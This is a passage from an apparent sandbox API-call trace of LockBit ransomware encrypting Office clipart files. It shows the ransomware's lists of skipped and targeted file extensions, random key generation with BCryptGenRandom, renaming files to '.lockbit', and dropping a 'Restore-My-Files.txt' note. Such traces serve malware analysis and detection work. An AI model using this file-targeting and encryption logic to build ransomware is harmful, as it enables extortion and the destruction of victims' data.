lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".spl", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".ps1", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".msu", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".ics", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".key", lpString2=".GIF") returned 1 [0169.437] lstrcmpiW (lpString1=".mp3", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".reg", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".dll", lpString2=".GIF") returned -1 [0169.438] lstrcmpiW (lpString1=".ini", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".idx", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".sys", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".hlp", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".ico", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".lnk", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".rdp", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1=".lockbit", lpString2=".GIF") returned 1 [0169.438] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02736G.GIF") returned 1 [0169.438] lstrcmpiW (lpString1="ntldr", lpString2="PH02736G.GIF") returned -1 [0169.438] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02736G.GIF") returned -1 [0169.438] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02736G.GIF") returned -1 [0169.438] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02736G.GIF") returned -1 [0169.438] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02736G.GIF") returned 1 [0169.438] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02736G.GIF") returned -1 [0169.438] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.438] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF") returned=".GIF" [0169.439] lstrcmpiW (lpString1=".rar", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".zip", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".7z", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".ckp", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dacpac", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".db", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".db-shm", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".db-wal", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".db3", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dbf", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dbc", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dbs", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dbt", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".dbv", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".frm", lpString2=".GIF") returned -1 [0169.439] lstrcmpiW (lpString1=".mdf", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".mrg", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".mwb", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".myd", lpString2=".GIF") returned 1 [0169.439] lstrcmpiW (lpString1=".ndf", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".qry", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sdb", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sdf", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sql", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sqlite", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sqlite3", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".sqlitedb", lpString2=".GIF") returned 1 [0169.440] lstrcmpiW (lpString1=".tmd", lpString2=".GIF") returned 1 [0169.440] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF.lockbit") returned 72 [0169.440] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736g.gif"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.441] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.441] malloc (_Size=0x40068) returned 0x3df0008 [0169.441] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=25499) returned 1 [0169.441] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.442] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.442] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.442] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.443] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.443] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.443] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.446] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.446] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.446] NtSetInformationFile (FileHandle=0x170, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.447] free (_Block=0x1fa2ed8) [0169.447] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736G.GIF" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.447] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.447] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.448] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x924cca00, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x6ce95a50, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x924cca00, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x7e90, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02736U.BMP", cAlternateFileName="")) returned 1 [0169.448] lstrcmpiW (lpString1=".", lpString2="PH02736U.BMP") returned -1 [0169.448] lstrcmpiW (lpString1="..", lpString2="PH02736U.BMP") returned -1 [0169.448] PathFindExtensionW (pszPath="PH02736U.BMP") returned=".BMP" [0169.448] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.448] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.448] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.448] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.448] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.449] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.449] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.449] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.647] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.648] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02736U.BMP") returned 1 [0169.648] lstrcmpiW (lpString1="ntldr", lpString2="PH02736U.BMP") returned -1 [0169.648] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02736U.BMP") returned -1 [0169.648] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02736U.BMP") returned -1 [0169.648] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02736U.BMP") returned -1 [0169.648] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02736U.BMP") returned 1 [0169.648] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02736U.BMP") returned -1 [0169.649] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.649] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP") returned=".BMP" [0169.649] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.649] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.649] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.650] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.650] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP.lockbit") returned 72 [0169.650] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02736u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x308 [0169.651] CreateIoCompletionPort (FileHandle=0x308, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.651] malloc (_Size=0x40068) returned 0x1ff1e60 [0169.651] GetFileSizeEx (in: hFile=0x308, lpFileSize=0x1ff1e78 | out: lpFileSize=0x1ff1e78*=32400) returned 1 [0169.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.652] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.652] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031e94, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031e94) returned 0x0 [0169.652] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.653] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.653] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x2031ea4, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x2031ea4) returned 0x0 [0169.653] ReadFile (in: hFile=0x308, lpBuffer=0x1ff1e94, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60 | out: lpBuffer=0x1ff1e94, lpNumberOfBytesRead=0x0, lpOverlapped=0x1ff1e60) returned 0x0 [0169.658] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.658] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.658] NtSetInformationFile (FileHandle=0x308, IoStatusBlock=0x3d6b6b4, FileInformation=0x1fa2ed8, Length=0xa6, FileInformationClass=0xa) returned 0x0 [0169.686] free (_Block=0x1fa2ed8) [0169.686] PathRemoveFileSpecW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02736U.BMP" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR") returned 1 [0169.686] wsprintfW (in: param_1=0x3d6b4a0, param_2="%s\\Restore-My-Files.txt" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt") returned 72 [0169.686] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\Restore-My-Files.txt" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\restore-my-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0xffffffff [0169.686] FindNextFileW (in: hFindFile=0x55fe38, lpFindFileData=0x3d6bd48 | out: lpFindFileData=0x3d6bd48*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x88c36200, ftCreationTime.dwHighDateTime=0x1bd4e53, ftLastAccessTime.dwLowDateTime=0x5a3ff2b0, ftLastAccessTime.dwHighDateTime=0x1d301bf, ftLastWriteTime.dwLowDateTime=0x88c36200, ftLastWriteTime.dwHighDateTime=0x1bd4e53, nFileSizeHigh=0x0, nFileSizeLow=0x8118, dwReserved0=0x0, dwReserved1=0x0, cFileName="PH02738U.BMP", cAlternateFileName="")) returned 1 [0169.686] lstrcmpiW (lpString1=".", lpString2="PH02738U.BMP") returned -1 [0169.686] lstrcmpiW (lpString1="..", lpString2="PH02738U.BMP") returned -1 [0169.687] PathFindExtensionW (pszPath="PH02738U.BMP") returned=".BMP" [0169.687] lstrcmpiW (lpString1=".386", lpString2=".BMP") returned -1 [0169.687] lstrcmpiW (lpString1=".cmd", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".exe", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".ani", lpString2=".BMP") returned -1 [0169.687] lstrcmpiW (lpString1=".adv", lpString2=".BMP") returned -1 [0169.687] lstrcmpiW (lpString1=".theme", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".msi", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".msp", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".com", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".diagpkg", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".nls", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".diagcab", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".lock", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".ocx", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".mpa", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".cpl", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".mod", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".hta", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".icns", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".prf", lpString2=".BMP") returned 1 [0169.687] lstrcmpiW (lpString1=".rtp", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".diagcfg", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".msstyles", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".bin", lpString2=".BMP") returned -1 [0169.688] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".shs", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".drv", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".wpx", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".bat", lpString2=".BMP") returned -1 [0169.688] lstrcmpiW (lpString1=".rom", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".msc", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".spl", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".ps1", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".msu", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".ics", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".key", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".mp3", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".reg", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".dll", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".ini", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".idx", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".sys", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".hlp", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".ico", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".lnk", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".rdp", lpString2=".BMP") returned 1 [0169.688] lstrcmpiW (lpString1=".lockbit", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1="Restore-My-Files.txt", lpString2="PH02738U.BMP") returned 1 [0169.689] lstrcmpiW (lpString1="ntldr", lpString2="PH02738U.BMP") returned -1 [0169.689] lstrcmpiW (lpString1="ntuser.dat.log", lpString2="PH02738U.BMP") returned -1 [0169.689] lstrcmpiW (lpString1="bootsect.bak", lpString2="PH02738U.BMP") returned -1 [0169.689] lstrcmpiW (lpString1="autorun.inf", lpString2="PH02738U.BMP") returned -1 [0169.689] lstrcmpiW (lpString1="thumbs.db", lpString2="PH02738U.BMP") returned 1 [0169.689] lstrcmpiW (lpString1="iconcache.db", lpString2="PH02738U.BMP") returned -1 [0169.689] PathAddBackslashW (in: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR" | out: pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\") returned="" [0169.689] PathFindExtensionW (pszPath="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP") returned=".BMP" [0169.689] lstrcmpiW (lpString1=".rar", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".zip", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".7z", lpString2=".BMP") returned -1 [0169.689] lstrcmpiW (lpString1=".ckp", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dacpac", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".db", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".db-shm", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".db-wal", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".db3", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dbf", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dbc", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dbs", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dbt", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".dbv", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".frm", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".mdf", lpString2=".BMP") returned 1 [0169.689] lstrcmpiW (lpString1=".mrg", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".mwb", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".myd", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".ndf", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".qry", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sdb", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sdf", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sql", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sqlite", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sqlite3", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".sqlitedb", lpString2=".BMP") returned 1 [0169.690] lstrcmpiW (lpString1=".tmd", lpString2=".BMP") returned 1 [0169.690] wsprintfW (in: param_1=0x3d6b290, param_2="%s.lockbit" | out: param_1="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP.lockbit") returned 72 [0169.690] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP" (normalized: "c:\\program files\\microsoft office\\clipart\\pub60cor\\ph02738u.bmp"), dwDesiredAccess=0xc0010000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x50000000, hTemplateFile=0x0) returned 0x170 [0169.691] CreateIoCompletionPort (FileHandle=0x170, ExistingCompletionPort=0x14c, CompletionKey=0x0, NumberOfConcurrentThreads=0x0) returned 0x14c [0169.692] malloc (_Size=0x40068) returned 0x3df0008 [0169.692] GetFileSizeEx (in: hFile=0x170, lpFileSize=0x3df0020 | out: lpFileSize=0x3df0020*=33048) returned 1 [0169.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.692] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.692] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3003c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3003c) returned 0x0 [0169.692] LoadLibraryA (lpLibFileName="bcrypt.dll") returned 0x753f0000 [0169.693] GetProcAddress (hModule=0x753f0000, lpProcName="BCryptGenRandom") returned 0x753f1e2e [0169.693] BCryptGenRandom (in: hAlgorithm=0x0, pbBuffer=0x3e3004c, cbBuffer=0x10, dwFlags=0x2 | out: pbBuffer=0x3e3004c) returned 0x0 [0169.693] ReadFile (in: hFile=0x170, lpBuffer=0x3df003c, nNumberOfBytesToRead=0x10, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008 | out: lpBuffer=0x3df003c*, lpNumberOfBytesRead=0x0, lpOverlapped=0x3df0008) returned 1 [0169.698] RtlDosPathNameToNtPathName_U (in: DosPathName="C:\\\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP.lockbit", NtPathName=0x3d6b8e8, NtFileNamePart=0x0, DirectoryInfo=0x0 | out: NtPathName="\\??\\C:\\Program Files\\Microsoft Office\\CLIPART\\PUB60COR\\PH02738U.BMP.lockbit", NtFileNamePart=0x0, DirectoryInfo=0x0) returned 1 [0169.698] malloc (_Size=0xa6) returned 0x1fa2ed8 [0169.698] NtSetInformationFile 